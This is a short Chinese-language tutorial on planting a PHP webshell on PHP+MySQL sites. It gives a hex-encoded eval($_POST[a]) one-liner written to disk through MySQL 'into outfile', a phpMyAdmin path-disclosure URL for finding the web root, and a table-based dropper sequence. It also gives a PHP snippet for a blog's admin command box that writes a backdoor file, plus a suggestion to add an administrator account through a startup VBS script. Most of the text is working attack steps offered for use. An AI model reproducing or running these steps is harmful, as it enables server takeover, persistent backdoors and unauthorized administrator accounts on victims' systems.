拿 php+mysql

在mysql操作里输入select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile '路径’ 就可以获得了一个＜?eval($_POST[a]);?＞的最小马'  0x3C3F6576616C28245F504F53545B615D293B3F3E 是我们＜?eval($_POST[a]);?＞的十六进制，这种方法对phpmyadmin比较普遍，先利用phpmyadmin的路径泄露漏洞，比较典型的 是http://url/phpmyadmin/libraries/select_lang.lib.php。

　　就可以暴出路径，php环境中比较容易暴出绝对路径：）。提一点的是遇到是mysql在win系统下路径应该这样写d:\\wwwroot\\a.php。下面的方法是比较常用的一个导出webshell的方法，也可以写个vbs添加系统管理员的脚本导出到启动文件夹，系统重起后就会添加一个管理员帐号

CREATE TABLE a(cmd text NOT NULL)
INSERT INTO a(cmd) VALUES('＜?fputs(fopen("./a.php","w"),"＜?eval(\$_POST[a]);?＞")?＞') 
select cmd from a into outfile '路径/b.php'
DROP TABLE IF EXISTS a
访问b.php就会生成一个＜?eval($_POST[a]);?＞的最小马。
如果遇到可以执行php命令就简单多了,典型的代表是BO-BLOG,在后台的php命令框输入以下代码：
＜?
$sa = fopen("./up/saiy.php","w");
fwrite($sa,"＜?eval(\$_POST[a]);?"."＞");
fclose($sa);
?＞

　　就会在up目录下生成文件名为saiy.php内容为＜?eval($_POST[a]);?＞的最小php木马， 最后用lanker的客户端来连接。实际运用中要考虑到文件夹是否有写权限。或者输入这样的代码＜?fputs(fopen("./a.php","w"),"＜?eval(\$_POST[a]);?＞")?＞ 将会在当前目录生成一个a.php的最小马。